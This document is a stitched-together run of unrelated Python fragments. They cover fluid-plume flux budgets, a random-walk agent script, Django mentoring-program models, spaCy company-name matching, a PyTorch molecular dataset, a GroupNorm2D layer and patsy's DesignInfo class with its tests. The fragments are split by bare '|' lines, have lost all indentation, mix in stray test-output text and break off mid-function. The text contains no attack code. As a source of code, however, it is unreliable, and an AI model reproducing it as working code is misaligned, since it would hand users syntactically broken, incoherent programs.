mask_ring -= 4*m
for t_i in range(n_time):
sides = 0
for z_i in range(new_nz-1):
f = fields[var][t_i,z_i]
rad_proy = (u[t_i,z_i]*X + v[t_i,z_i]*Y)/r
aux = ma.masked_array(f*rad_proy, mask_ring>=0)
sides += aux.mean()
lid = ma.masked_array(f*w[t_i, new_nz], mask.mask)
budget[t_i] = sides + lid.mean()
return budget
def Lateral_flux(self, var, r_lim, z_lim):
"""
"""
Lx = self.params['Lx']
Ly = self.params['Ly']
Lz = self.params['Lz']
nz = self.params['nz']
t = self.read_vars(['t'])['t']
n_time = t.shape[0]
dx = self.params['dx']
dy = self.params['dy']
dz = self.params['dz']
r_max = r_lim # as in forced_plume_nudging.py
z_max = z_lim
new_nz = int(nz*z_lim)
budget = np.zeros(n_time)
fields = self.read_vars([var, 'u', 'v', 'x', 'y'])
v = velocity_interpolation(fields['v'], axis=2)
u = velocity_interpolation(fields['u'], axis=3)
X, Y = np.meshgrid(fields['x']/Lx - 0.5,
fields['y']/Ly - 0.5)
r = np.sqrt(X**2 + Y**2)
mask = ma.masked_outside(r, 0, r_max)
m = mask.mask*1
mask_ring = np.roll(m, -1, axis=0) + np.roll(m, 1, axis=0)
mask_ring += np.roll(m, -1, axis=1) + np.roll(m, 1, axis=1)
mask_ring -= 4*m
for t_i in range(n_time):
sides = 0
for z_i in range(new_nz-1):
f = fields[var][t_i,z_i]
rad_proy = (u[t_i,z_i]*X + v[t_i,z_i]*Y)/r
aux = ma.masked_array(f*rad_proy, mask_ring>=0)
sides += aux.sum()
budget[t_i] = sides
return budget
def Lid_flux(self, var, r_lim, z_lim):
Lx = self.params['Lx']
Ly = self.params['Ly']
Lz = self.params['Lz']
nz = self.params['nz']
t = self.read_vars(['t'])['t']
n_time = t.shape[0]
r_max = r_lim # as in forced_plume_nudging.py
z_max = z_lim
new_nz = int(nz*z_lim)
budget = np.zeros(n_time)
fields = self.read_vars([var, 'w', 'x', 'y'])
w = velocity_interpolation(fields['w'], axis=1)
X, Y = np.meshgrid(fields['x']/Lx - 0.5,
fields['y']/Ly - 0.5)
r = np.sqrt(X**2 + Y**2)
mask = ma.masked_outside(r, 0, r_max)
for t_i in range(n_time):
f = fields[var][t_i,new_nz,:,:]
lid = ma.masked_array(f*w[t_i,new_nz,:,:], mask.mask)
budget[t_i] = lid.mean()
return budget
def Volume_integral(self, var, r_lim, z_lim):
"""
"""
Lx = self.params['Lx']
Ly = self.params['Ly']
Lz = self.params['Lz']
nz = self.params['nz']
dx = self.params['dx']
dy = self.params['dy']
dz = self.params['dz']
t = self.read_vars(['t'])['t']
n_time = t.shape[0]
r_max = r_lim # as in forced_plume_nudging.py
z_max = z_lim
new_nz = int(nz*z_lim)
budget = np.zeros(n_time)
fields = self.read_vars([var, 'x', 'y'])
X, Y = np.meshgrid(fields['x']/Lx - 0.5,
fields['y']/Ly - 0.5)
r = np.sqrt(X**2 + Y**2)
mask = ma.masked_outside(r, 0, r_max)
for t_i in range(n_time):
aux = np.zeros(new_nz)
for z_i in range(new_nz):
field_new = ma.masked_array(fields[var][t_i,z_i],mask.mask)
aux[z_i] = field_new.sum()
budget[t_i] = aux.sum()
return budget*dx*dy*dz
def velocity_interpolation(a, axis=-1):
"""
Linear interpolation for velocity in a staggered type C grid.
Z-convention (nz, ny, nx)
Parameters
----------
a : array_like
Input array
axis : int, optional
The axis along which the difference is taken, default is the
last axis.
Returns
-------
U_interp : ndarray
Array with same dimension as input.
"""
nd = len(a.shape)
# adding one extra dimension to field at the lower boundary with
# zeros.
a_shape = list(a.shape)
a_shape[axis] = a.shape[axis] + 1
a_shape = tuple(a_shape)
slice0 = [slice(None)] * nd
slice0[axis] = slice(1, None)
slice0 = tuple(slice0)
a_prim = np.zeros(a_shape)
a_prim[slice0] = a
# doing the interpolation
slice1 = [slice(None)] * nd
slice2 = [slice(None)] * nd
slice1[axis] = slice(None, -1)
slice2[axis] = slice(1, None)
slice1 = tuple(slice1)
slice2 = tuple(slice2)
a_interp = (a_prim[slice1] + a_prim[slice2])/2
return a_interp
def find_z_plume(array, percent):
"""
Returns the index corresponding to the height of the plume.
Parameters
----------
array : array_like
must be the momentum flux computed with Flux_levels.
percent : float between 0 to 1
the criteria for the plume heigth. Normally is 10% (i.e. 0.1)
of the maximum momentum flux.
Returns
-------
idx : int
index of the top limit.
"""
array = np.asarray(array[1:])
maximum = array.max()
difference = np.abs(array - maximum*percent)
idx = difference.argmin()
return idx+1
def z_r(b):
"""
height at which the fluid parce with buoyancy b would reside if the
buoyancy field will be adiabatically rearranged to a state of static
equilibrium.
"""
return b/1e-2 + 0.5
def mixing_efficiency(ϕb, ϕz, ϕp):
return (ϕb - ϕz)/(ϕb - ϕp)
|
Your input
[1,3,5,4,7]
Output
3
Expected
3
Your input
[1,3,5,6,7]
Output
5
Expected
5
|
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 28 18:29:53 2017
@author: amandaf
"""
import random, operator, matplotlib.pyplot
agents = []
# Set up random position in grid 100x100.
agents.append([random.randint(0,99),random.randint(0,99)])
print (agents)
# Random walk one step.
if random.random() <0.5:
agents[0][0] += 1
else:
agents[0][0]-= 1
if random.random() <0.5:
agents[0][1] += 1
else:
agents[0][1] -= 1
if random.random() <0.5:
agents[0][0] += 1
else:
agents[0][0] -= 1
if random.random() <0.5:
agents[0][1] += 1
else:
agents[0][1] -= 1
# Set up random position in grid 100x100.
agents.append([random.randint(0,99),random.randint(0,99)])
# Random walk one step.
if random.random() <0.5:
agents[1][0] += 1
else:
agents[1][0] -= 1
if random.random() <0.5:
agents[1][1] += 1
else:
agents[1][1] -= 1
if random.random() <0.5:
agents[1][0] += 1
else:
agents[1][0] -= 1
if random.random() <0.5:
agents[1][1] += 1
else:
agents[1][1] -= 1
print (agents)
distance = ((agents[0][0]-agents[1][0])**2 + (agents[0][1]-agents[1][1])**2)**0.5
print (distance)
print (max(agents, key=operator.itemgetter(1)))
matplotlib.pyplot.ylim(0, 99)
matplotlib.pyplot.xlim(0, 99)
matplotlib.pyplot.scatter(agents[0][1],agents[0][0])
matplotlib.pyplot.scatter(agents[1][1],agents[1][0])
matplotlib.pyplot.scatter(agents[1][1],agents[1][0], color='red')
matplotlib.pyplot.show()
|
"""Contains all the table definitions of the project."""
from django.db import models
from django.contrib.auth import get_user_model
# Create your models here.
# Need to figure out how to include the following
# Are you interested in serving as a mentor to students who identify as any of the following (check all that may apply)
class Ally(models.Model):
"""
Ally model contains the details of the IBA allies
"""
user = models.ForeignKey(
get_user_model(),
on_delete=models.CASCADE,
)
hawk_id = models.CharField(max_length=100)
image_url = models.CharField(max_length=500,
default="https://sepibafiles.blob.core.windows.net/sepibacontainer/blank-profile-picture.png")
user_type = models.CharField(max_length=25) # student/faculty/..
## Additional authentication fields
reset_password = models.BooleanField(default=False)
def __str__(self):
return self.hawk_id
## Grad and Faculty
area_of_research = models.CharField(max_length=500, null=True)
openings_in_lab_serving_at = models.BooleanField(default=False)
description_of_research_done_at_lab = models.CharField(max_length=500, null=True)
interested_in_mentoring = models.BooleanField(default=False)
interested_in_mentor_training = models.BooleanField(default=False)
willing_to_offer_lab_shadowing = models.BooleanField(default=False)
interested_in_connecting_with_other_mentors = models.BooleanField(default=False)
willing_to_volunteer_for_events = models.BooleanField(default=False)
works_at = models.CharField(max_length=200, null=True)
## Staff
people_who_might_be_interested_in_iba = models.BooleanField(default=False)
how_can_science_ally_serve_you = models.CharField(max_length=500, null=True)
## Undergraduate
year = models.CharField(max_length=30)
major = models.CharField(max_length=50)
information_release = models.BooleanField(default=False)
interested_in_being_mentored = models.BooleanField(default=False)
identity = models.CharField(max_length=200, blank=True)
interested_in_joining_lab = models.BooleanField(default=False)
has_lab_experience = models.BooleanField(default=False)
class AllyMentorRelation(models.Model):
"""
AllyMentorRelation table is used for mapping One to One relationship between allies and their mentors
"""
ally = models.OneToOneField(
Ally,
related_name='ally_mentor_relation',
on_delete=models.CASCADE,
)
mentor = models.ForeignKey(
Ally,
related_name='mentor',
on_delete=models.CASCADE,
)
class AllyMenteeRelation(models.Model):
"""
AllyMenteeRelation table is used for mapping One to Manu relationship between allies and their mentee
"""
ally = models.ForeignKey(
Ally,
related_name='ally_mentee_relation',
on_delete=models.CASCADE,
)
mentee = models.ForeignKey(
Ally,
related_name='mentee',
on_delete=models.CASCADE,
)
class StudentCategories(models.Model):
"""
StudentCategories table contains the different special cateories an uiowa student can belong to
"""
under_represented_racial_ethnic = models.BooleanField(default=False)
first_gen_college_student = models.BooleanField(default=False)
transfer_student = models.BooleanField(default=False)
lgbtq = models.BooleanField(default=False)
low_income = models.BooleanField(default=False)
rural = models.BooleanField(default=False)
disabled = models.BooleanField(default=False)
class AllyStudentCategoryRelation(models.Model):
"""
AllyStudentCategoryRelation table is used for mapping Many to Many relationship between allies and StudentCategories table
"""
ally = models.ForeignKey(
Ally,
on_delete=models.CASCADE,
)
student_category = models.ForeignKey(
StudentCategories,
on_delete=models.CASCADE,
)
class Event(models.Model):
"""
Evert table contains information about the IBA science alliance events
"""
title = models.CharField(max_length=200, null=True)
description = models.CharField(max_length=1000, null=True)
start_time = models.DateTimeField(default=None, null=True)
end_time = models.DateTimeField(default=None, null=True)
allday = models.CharField(max_length=500, null=True)
location = models.CharField(max_length=500, null=True)
num_invited = models.IntegerField(default=0)
num_attending = models.IntegerField(default=0)
role_selected = models.CharField(max_length=500, null=True)
school_year_selected = models.CharField(max_length=500, null=True)
mentor_status = models.CharField(max_length=500, null=True)
research_field = models.CharField(max_length=500, null=True)
invite_all = models.CharField(max_length=500, null=True)
special_category = models.CharField(max_length=500, null=True)
class EventInviteeRelation(models.Model):
"""
EventAllyRelation table contains information about the Event ally mappings
One event can have many allies invited and vice versa
"""
event = models.ForeignKey(Event,
on_delete=models.CASCADE
)
ally = models.ForeignKey(Ally,
on_delete=models.CASCADE
)
class Announcement(models.Model):
"""
Announcement table contains information about the announcemernts made by admin
"""
username = models.CharField(max_length=100)
title = models.CharField(max_length=200, null=True)
description = models.CharField(max_length=1000, null=True)
created_at = models.DateTimeField()
class EventAttendeeRelation(models.Model):
"""
EventAttendeeRelation table contains information about the Event ally mappings
One event can have many allies registered and vice versa
"""
event = models.ForeignKey(Event,
on_delete=models.CASCADE
)
ally = models.ForeignKey(Ally,
on_delete=models.CASCADE
)
|
import spacy
import pickle
from fuzzywuzzy import fuzz #fuzz value to check similarity between two strings
import read_symbol
def get_list(sentence):
MIN_FUZZ_VALUE=55 #fuzz value to check similarity between two strings
nlp = spacy.load('en_core_web_sm') #pretrained model
company_name=read_symbol.get_company_name() # list containing company_name
security=read_symbol.get_company_security() # list containing security symbols
final_list=[] # list containing output list (company_name,security)
doc = nlp(sentence) #used to find entity
for ent in doc.ents:
temp_fuzz_value=[] #used to store all fuzz values
#Now it checks the maximum fuzz value and outputs only single company instead of multiple
for indx in range(len(company_name)):
temp_fuzz_value.append(fuzz.ratio(ent.text,company_name[indx]))
max_fuzz_value=max(temp_fuzz_value) #Find maximum fuzz value to get best results
company_index=temp_fuzz_value.index(max_fuzz_value)
if(max_fuzz_value>=MIN_FUZZ_VALUE):
#print(ent.text)
final_list.append([ent.text,security[company_index]])
return final_list
|
import numpy as np
import torch
from torch.utils.data import Dataset
from ..wrappers import *
from .. import grids
def scale_func_sigmoid(break_point=1.2, steepness=3.):
buf = np.exp(steepness*break_point)
c1 = 1./steepness*np.log(buf-2.)
c2 = (1.-buf)/(2.-buf)
target_scale = lambda x: c2 / (1. + np.exp((x - c1)*steepness))
return target_scale
class MolDataset(Dataset):
"""Mol dataset."""
def __init__(self, csv_table,
root_dir='.',
target_col='target',
path_col='path',
input_is_pdb=True,
grid_maker=None,
bin_size=1.0,
grid_transform=None,
pdb_transform=None,
target_transform=None,
add_index=False,
remove_grid=False):
"""
Args:
csv_table (pandas.DataFrame): Must contain columns specified in target_col and path_col
root_dir (string, optional): Directory with all the samples (default: '.')
input_is_pdb (bool, optional): Indicates that data samples are in pdb format (default: True).
grid_maker (class GridMaker, optional): Custom GridMaker (default: None)
bin_size (float, optional): Grid bin size in Angstroms (default: 0.1)
grid_transform (callable, optional): Optional transform to be applied on a grid. Returns numpy.array. (default: None).
pdb_transform (callable, optional): Optional transform to be applied on a sample. Returns path to new pdb. (default: None).
target_transform (callable, optional): Optional transform to be applied on a sample. Returns single float (default: None).
"""
if path_col not in csv_table.columns:
raise ValueError('Table must contain column "%s"' % path_col)
if target_col not in csv_table.columns:
raise ValueError('Table must contain column "%s"' % target_col)
self.csv = csv_table
self.target_list = np.array(self.csv[target_col], dtype=float)
self.path_list = np.array(self.csv[path_col])
self.root_dir = root_dir
self.grid_transform = grid_transform
self.pdb_transform = pdb_transform
self.target_transform = target_transform
self.input_is_pdb = input_is_pdb
self.add_index = add_index
self.remove_grid = remove_grid
if self.input_is_pdb:
self.bin_size = bin_size
if not grid_maker:
self.grid_maker = grids.GridMaker()
else:
self.grid_maker = grid_maker
'''
def make_grid(self, pdb_path, remove_tmp=True, hsd2his=True):
if hsd2his:
tmp_file = pdb_path + '.tmp'
utils.hsd2his(pdb_path, tmp_file)
else:
tmp_file = pdb_path
bin_size = self.bin_size
props_file = self.grid_maker.properties_file
types_file = self.grid_maker.types_file
nchannels = self.grid_maker.nchannels
grid = molgrid.make_grid(tmp_file, props_file, types_file, bin_size, nchannels)
if hsd2his and remove_tmp:
remove_files([tmp_file])
return grid
'''
def __len__(self):
return self.csv.shape[0]
def __getitem__(self, idx):
# get sample path
local_path = self.path_list[idx]
full_path = os.path.join(self.root_dir, local_path)
file_absent_error(full_path)
grid_path = None
if self.input_is_pdb:
# transform pdb if needed
if self.pdb_transform:
full_path = self.pdb_transform(full_path)
try:
grid = self.grid_maker.make_grid(full_path, self.bin_size)
except Exception as e:
logging.error('Failed creating grid for %s' % full_path)
logging.exception(e)
raise
else:
grid_path = full_path
if grid_path:
dims, grid = self.grid_maker.read_grid(grid_path)
grid = grid.reshape(dims)
if self.remove_grid:
remove_files([grid_path])
# trasform grid
if self.grid_transform:
grid = self.grid_transform(grid)
grid = torch.from_numpy(grid)
# read and transform target
target = self.target_list[idx]
if self.target_transform:
target = self.target_transform(target)
#if self.add_index:
sample = (grid.type(torch.FloatTensor), np.float32(target), np.long(idx))
#else:
# sample = (grid.type(torch.FloatTensor), np.float32(target))
return sample
|
SCHEDULER_INTERVAL_IN_SECONDS = 1
SCHEDULER_MAX_SIMULTANEOUS_INSTANCES = 3
|
import torch
from .module import Module
class GroupNorm2D(Module):
r"""Applies Group Normalization over a mini-batch of inputs as described in
the paper `Group Normalization`_ .
.. math::
y = \frac{x - \mathrm{E}[x]}{ \sqrt{\mathrm{Var}[x]} + \epsilon} * \gamma + \beta
The mean and standard-deviation are calculated separately per mini-batch.
:math:`\gamma` and :math:`\beta` are hyper-parameters
Shape:
- Input: :math:`(N, *)`
- Output: :math:`(N, *)` (same shape as input)
Examples:
>>> input = torch.randn(32, 64, 32, 32)
>>> # With Default Hyper-Parameters
>>> m = nn.GroupNorm2D(gamma=1, beta=0.5, group=32, eps=1e-5)
>>> # Activating the module
>>> output = m(input)
.. _`Group Normalization`: https://arxiv.org/abs/1803.08494
"""
def __init__(self, gamma=1, beta=0.5, group=32, eps=1e-5):
super(GroupNorm2D, self).__init__()
self.gamma = gamma
self.beta = beta
self.group = group
self.eps = eps
def _check_input_dim(self, inputs):
if inputs.dim() != 4:
raise ValueError('expected 4D input (got {}D input)'
.format(inputs.dim()))
def forward(self, inputs):
self._check_input_dim(inputs)
N, C, H, W = inputs.size()
inputs = inputs.view(N, self.group, C // self.group, H, W)
mean, var = inputs.mean(1, keepdim=True), inputs.var(1, keepdim=True)
inputs = (inputs - mean) / torch.sqrt(var + self.eps)
inputs = inputs.view(N, C, H, W)
return inputs * self.gamma + self.beta
|
# This file is part of Patsy
# Copyright (C) 2011-2012 Nathaniel Smith <njs@pobox.com>
# See file COPYING for license information.
# This file defines the main class for storing metadata about a model
# design. It also defines a 'value-added' design matrix type -- a subclass of
# ndarray that represents a design matrix and holds metadata about its
# columns. The intent is that these are useful and usable data structures
# even if you're not using *any* of the rest of patsy to actually build
# your matrices.
# These are made available in the patsy.* namespace
__all__ = ["DesignInfo", "DesignMatrix"]
import numpy as np
from patsy import PatsyError
from patsy.util import atleast_2d_column_default
from patsy.compat import OrderedDict
from patsy.util import repr_pretty_delegate, repr_pretty_impl
from patsy.constraint import linear_constraint
class DesignInfo(object):
"""A DesignInfo object holds metadata about a design matrix.
This is the main object that Patsy uses to pass information to
statistical libraries. Usually encountered as the `.design_info` attribute
on design matrices.
"""
def __init__(self, column_names,
term_slices=None, term_name_slices=None,
builder=None):
self.column_name_indexes = OrderedDict(zip(column_names,
range(len(column_names))))
if term_slices is not None:
#: An OrderedDict mapping :class:`Term` objects to Python
#: func:`slice` objects. May be None, for design matrices which
#: were constructed directly rather than by using the patsy
#: machinery. If it is not None, then it
#: is guaranteed to list the terms in order, and the slices are
#: guaranteed to exactly cover all columns with no overlap or
#: gaps.
self.term_slices = OrderedDict(term_slices)
if term_name_slices is not None:
raise ValueError("specify only one of term_slices and "
"term_name_slices")
term_names = [term.name() for term in self.term_slices]
#: And OrderedDict mapping term names (as strings) to Python
#: :func:`slice` objects. Guaranteed never to be None. Guaranteed
#: to list the terms in order, and the slices are
#: guaranteed to exactly cover all columns with no overlap or
#: gaps. Name overlap is allowed between term names and column
#: names, but it is guaranteed that if it occurs, then they refer
#: to exactly the same column.
self.term_name_slices = OrderedDict(zip(term_names,
self.term_slices.values()))
else: # term_slices is None
self.term_slices = None
if term_name_slices is None:
# Make up one term per column
term_names = column_names
slices = [slice(i, i + 1) for i in xrange(len(column_names))]
term_name_slices = zip(term_names, slices)
self.term_name_slices = OrderedDict(term_name_slices)
self.builder = builder
# Guarantees:
# term_name_slices is never None
# The slices in term_name_slices are in order and exactly cover the
# whole range of columns.
# term_slices may be None
# If term_slices is not None, then its slices match the ones in
# term_name_slices.
# If there is any name overlap between terms and columns, they refer
# to the same columns.
assert self.term_name_slices is not None
if self.term_slices is not None:
assert self.term_slices.values() == self.term_name_slices.values()
covered = 0
for slice_ in self.term_name_slices.itervalues():
start, stop, step = slice_.indices(len(column_names))
if start != covered:
raise ValueError, "bad term slices"
if step != 1:
raise ValueError, "bad term slices"
covered = stop
if covered != len(column_names):
raise ValueError, "bad term indices"
for column_name, index in self.column_name_indexes.iteritems():
if column_name in self.term_name_slices:
slice_ = self.term_name_slices[column_name]
if slice_ != slice(index, index + 1):
raise ValueError, "term/column name collision"
__repr__ = repr_pretty_delegate
def _repr_pretty_(self, p, cycle):
assert not cycle
if self.term_slices is None:
kwargs = [("term_name_slices", self.term_name_slices)]
else:
kwargs = [("term_slices", self.term_slices)]
if self.builder is not None:
kwargs.append(("builder", self.builder))
repr_pretty_impl(p, self, [self.column_names], kwargs)
@property
def column_names(self):
"A list of the column names, in order."
return self.column_name_indexes.keys()
@property
def terms(self):
"A list of :class:`Terms`, in order, or else None."
if self.term_slices is None:
return None
return self.term_slices.keys()
@property
def term_names(self):
"A list of terms, in order."
return self.term_name_slices.keys()
def slice(self, columns_specifier):
"""Locate a subset of design matrix columns, specified symbolically.
A patsy design matrix has two levels of structure: the individual
columns (which are named), and the :ref:`terms <formulas>` in
the formula that generated those columns. This is a one-to-many
relationship: a single term may span several columns. This method
provides a user-friendly API for locating those columns.
(While we talk about columns here, this is probably most useful for
indexing into other arrays that are derived from the design matrix,
such as regression coefficients or covariance matrices.)
The `columns_specifier` argument can take a number of forms:
* A term name
* A column name
* A :class:`Term` object
* An integer giving a raw index
* A raw slice object
In all cases, a Python :func:`slice` object is returned, which can be
used directly for indexing.
Example::
y, X = dmatrices("y ~ a", demo_data("y", "a", nlevels=3))
betas = np.linalg.lstsq(X, y)[0]
a_betas = betas[X.design_info.slice("a")]
(If you want to look up a single individual column by name, use
``design_info.column_name_indexes[name]``.)
"""
if isinstance(columns_specifier, slice):
return columns_specifier
if np.issubsctype(type(columns_specifier), np.integer):
return slice(columns_specifier, columns_specifier + 1)
if (self.term_slices is not None
and columns_specifier in self.term_slices):
return self.term_slices[columns_specifier]
if columns_specifier in self.term_name_slices:
return self.term_name_slices[columns_specifier]
if columns_specifier in self.column_name_indexes:
idx = self.column_name_indexes[columns_specifier]
return slice(idx, idx + 1)
raise PatsyError("unknown column specified '%s'"
% (columns_specifier,))
def linear_constraint(self, constraint_likes):
"""Construct a linear constraint in matrix form from a (possibly
symbolic) description.
Possible inputs:
* A dictionary which is taken as a set of equality constraint. Keys
can be either string column names, or integer column indexes.
* A string giving a arithmetic expression referring to the matrix
columns by name.
* A list of such strings which are ANDed together.
* A tuple (A, b) where A and b are array_likes, and the constraint is
Ax = b. If necessary, these will be coerced to the proper
dimensionality by appending dimensions with size 1.
The string-based language has the standard arithmetic operators, / * +
- and parentheses, plus "=" is used for equality and "," is used to
AND together multiple constraint equations within a string. You can
If no = appears in some expression, then that expression is assumed to
be equal to zero. Division is always float-based, even if
``__future__.true_division`` isn't in effect.
Returns a :class:`LinearConstraint` object.
Examples::
di = DesignInfo(["x1", "x2", "x3"])
# Equivalent ways to write x1 == 0:
di.linear_constraint({"x1": 0}) # by name
di.linear_constraint({0: 0}) # by index
di.linear_constraint("x1 = 0") # string based
di.linear_constraint("x1") # can leave out "= 0"
di.linear_constraint("2 * x1 = (x1 + 2 * x1) / 3")
di.linear_constraint(([1, 0, 0], 0)) # constraint matrices
# Equivalent ways to write x1 == 0 and x3 == 10
di.linear_constraint({"x1": 0, "x3": 10})
di.linear_constraint({0: 0, 2: 10})
di.linear_constraint({0: 0, "x3": 10})
di.linear_constraint("x1 = 0, x3 = 10")
di.linear_constraint("x1, x3 = 10")
di.linear_constraint(["x1", "x3 = 0"]) # list of strings
di.linear_constraint("x1 = 0, x3 - 10 = x1")
di.linear_constraint([[1, 0, 0], [0, 0, 1]], [0, 10])
# You can also chain together equalities, just like Python:
di.linear_constraint("x1 = x2 = 3")
"""
return linear_constraint(constraint_likes, self.column_names)
def describe(self):
"""Returns a human-readable string describing this design info.
Example:
.. ipython::
In [1]: y, X = dmatrices("y ~ x1 + x2", demo_data("y", "x1", "x2"))
In [2]: y.design_info.describe()
Out[2]: 'y'
In [3]: X.design_info.describe()
Out[3]: '1 + x1 + x2'
.. warning::
There is no guarantee that the strings returned by this
function can be parsed as formulas. They are best-effort descriptions
intended for human users.
"""
names = []
for name in self.term_names:
if name == "Intercept":
names.append("1")
else:
names.append(name)
return " + ".join(names)
@classmethod
def from_array(cls, array_like, default_column_prefix="column"):
"""Find or construct a DesignInfo appropriate for a given array_like.
If the input `array_like` already has a ``.design_info``
attribute, then it will be returned. Otherwise, a new DesignInfo
object will be constructed, using names either taken from the
`array_like` (e.g., for a pandas DataFrame with named columns), or
constructed using `default_column_prefix`.
This is how :func:`dmatrix` (for example) creates a DesignInfo object
if an arbitrary matrix is passed in.
:arg array_like: An ndarray or pandas container.
:arg default_column_prefix: If it's necessary to invent column names,
then this will be used to construct them.
:returns: a DesignInfo object
"""
if hasattr(array_like, "design_info") and isinstance(array_like.design_info, cls):
return array_like.design_info
arr = atleast_2d_column_default(array_like, preserve_pandas=True)
if arr.ndim > 2:
raise ValueError, "design matrix can't have >2 dimensions"
columns = getattr(arr, "columns", xrange(arr.shape[1]))
if (isinstance(columns, np.ndarray)
and not np.issubdtype(columns.dtype, np.integer)):
column_names = [str(obj) for obj in columns]
else:
column_names = ["%s%s" % (default_column_prefix, i)
for i in columns]
return DesignInfo(column_names)
def test_DesignInfo():
from nose.tools import assert_raises
class _MockTerm(object):
def __init__(self, name):
self._name = name
def name(self):
return self._name
t_a = _MockTerm("a")
t_b = _MockTerm("b")
di = DesignInfo(["a1", "a2", "a3", "b"],
[(t_a, slice(0, 3)), (t_b, slice(3, 4))],
builder="asdf")
assert di.column_names == ["a1", "a2", "a3", "b"]
assert di.term_names == ["a", "b"]
assert di.terms == [t_a, t_b]
assert di.column_name_indexes == {"a1": 0, "a2": 1, "a3": 2, "b": 3}
assert di.term_name_slices == {"a": slice(0, 3), "b": slice(3, 4)}
assert di.term_slices == {t_a: slice(0, 3), t_b: slice(3, 4)}
assert di.describe() == "a + b"
assert di.builder == "asdf"
assert di.slice(1) == slice(1, 2)
assert di.slice("a1") == slice(0, 1)
assert di.slice("a2") == slice(1, 2)
assert di.slice("a3") == slice(2, 3)
assert di.slice("a") == slice(0, 3)
assert di.slice(t_a) == slice(0, 3)
assert di.slice("b") == slice(3, 4)
assert di.slice(t_b) == slice(3, 4)
assert di.slice(slice(2, 4)) == slice(2, 4)
assert_raises(PatsyError, di.slice, "asdf")
# smoke test
repr(di)
# One without term objects
di = DesignInfo(["a1", "a2", "a3", "b"],
term_name_slices=[("a", slice(0, 3)),
("b", slice(3, 4))])
assert di.column_names == ["a1", "a2", "a3", "b"]
assert di.term_names == ["a", "b"]
assert di.terms is None
assert di.column_name_indexes == {"a1": 0, "a2": 1, "a3": 2, "b": 3}
assert di.term_name_slices == {"a": slice(0, 3), "b": slice(3, 4)}
assert di.term_slices is None
assert di.describe() == "a + b"
assert di.slice(1) == slice(1, 2)
assert di.slice("a") == slice(0, 3)
assert di.slice("a1") == slice(0, 1)
assert di.slice("a2") == slice(1, 2)
assert di.slice("a3") == slice(2, 3)
assert di.slice("b") == slice(3, 4)
# smoke test
repr(di)
# One without term objects *or* names
di = DesignInfo(["a1", "a2", "a3", "b"])
assert di.column_names == ["a1", "a2", "a3", "b"]
assert di.term_names == ["a1", "a2", "a3", "b"]
assert di.terms is None
assert di.column_name_indexes == {"a1": 0, "a2": 1, "a3": 2, "b": 3}
assert di.term_name_slices == {"a1": slice(0, 1),
"a2": slice(1, 2),
"a3": slice(2, 3),
"b": slice(3, 4)}
assert di.term_slices is None
assert di.describe() == "a1 + a2 + a3 + b"
assert di.slice(1) == slice(1, 2)
assert di.slice("a1") == slice(0, 1)
assert di.slice("a2") == slice(1, 2)
assert di.slice("a3") == slice(2, 3)
assert di.slice("b") == slice(3, 4)
# Check intercept handling in describe()
assert DesignInfo(["Intercept", "a", "b"]).describe() == "1 + a + b"
# Can't specify both term_slices and term_name_slices
assert_raises(ValueError,
DesignInfo,
["a1", "a2"],
term_slices=[(t_a, slice(0, 2))],
term_name_slices=[("a", slice(0, 2))])
# out-of-order slices are bad
assert_raises(ValueError, DesignInfo, ["a1", "a2", "a3", "a4"],
term_slices=[(t_a, slice(3, 4)), (t_b, slice(0, 3))])
# gaps in slices are bad
assert_raises(ValueError, DesignInfo, ["a1", "a2", "a3", "a4"],
term_slices=[(t_a, slice(0, 2)), (t_b, slice(3, 4))])
assert_raises(ValueError, DesignInfo, ["a1", "a2", "a3", "a4"],
term_slices=[(t_a, slice(1, 3)), (t_b, slice(3, 4))])
assert_raises(ValueError, DesignInfo, ["a1", "a2", "a3", "a4"],
term_slices=[(t_a, slice(0, 2)), (t_b, slice(2, 3))])
# overlapping slices ditto
assert_raises(ValueError, DesignInfo, ["a1", "a2", "a3", "a4"],
term_slices=[(t_a, slice(0, 3)), (t_b, slice(2, 4))])
# no step arguments
assert_raises(ValueError, DesignInfo, ["a1", "a2", "a3", "a4"],
term_slices=[(t_a, slice(0, 4, 2))])
# no term names that mismatch column names
assert_raises(ValueError, DesignInfo, ["a1", "a2", "a3", "a4"],
term_name_slices=[("a1", slice(0, 3)), ("b", slice(3, 4))])
def test_DesignInfo_from_array():
di = DesignInfo.from_array([1, 2, 3])
assert di.column_names == ["column0"]
di2 = DesignInfo.from_array([[1, 2], [2, 3], [3, 4]])
assert di2.column_names == ["column0", "column1"]
di3 = DesignInfo.from_array([1, 2, 3], default_column_prefix="x")
assert di3.column_names == ["x0"]
di4 = DesignInfo.from_array([[1, 2], [2, 3], [3, 4]],
default_column_prefix="x")
assert di4.column_names == ["x0", "x1"]
m = DesignMatrix([1, 2, 3], di3)
assert DesignInfo.from_array(m) is di3
# But weird objects are ignored
m.design_info = "asdf"
di_weird = DesignInfo.from_array(m)
assert di_weird.column_names == ["column0"]
from patsy.util import have_pandas
if have_pandas:
import pandas
# with named columns
di5 = DesignInfo.from_array(pandas.DataFrame([[1, 2]],
columns=["a", "b"]))
assert di5.column_names == ["a", "b"]
# with irregularly numbered columns
di6 = DesignInfo.from_array(pandas.DataFrame([[1, 2]],
columns=[0, 10]))
assert di6.column_names == ["column0", "column10"]
# with .design_info attr
df = pandas.DataFrame([[1, 2]])
df.design_info = di6
assert DesignInfo.from_array(df) is di6
def test_lincon():
di = DesignInfo(["a1", "a2", "a3", "b"],
term_name_slices=[("a", slice(0, 3)),
("b", slice(3, 4))])
con = di.linear_constraint(["2 * a1 = b + 1", "a3"])
assert con.variable_names == ["a1", "a2", "a3", "b"]
assert np.all(con.coefs == [[2, 0, 0, -1], [0, 0, 1, 0]])
assert np.all(con.constants == [[1], [0]])
# Idea: format with a reasonable amount of precision, then if that turns out
# to be higher than necessary, remove as many zeros as we can. But only do
# this while we can do it to *all* the ordinarily-formatted numbers, to keep
# decimal points aligned.
def _format_float_column(precision, col):
format_str = "%." + str(precision) + "f"
assert col.ndim == 1
# We don't want to look at numbers like "1e-5" or "nan" when stripping.
simple_float_chars = set("+-0123456789.")
col_strs = np.array([format_str % (x,) for x in col], dtype=object)
# Really every item should have a decimal, but just in case, we don't want
# to strip zeros off the end of "10" or something like that.
mask = np.array([simple_float_chars.issuperset(col_str) and "." in col_str
for col_str in col_strs])
mask_idxes = np.nonzero(mask)[0]
strip_char = "0"
if np.any(mask):
while True:
if np.all([s.endswith(strip_char) for s in col_strs[mask]]):
for idx in mask_idxes:
col_strs[idx] = col_strs[idx][:-1]
else:
if strip_char == "0":
strip_char = "."
else:
break
return col_strs
def test__format_float_column():
def t(precision, numbers, expected):
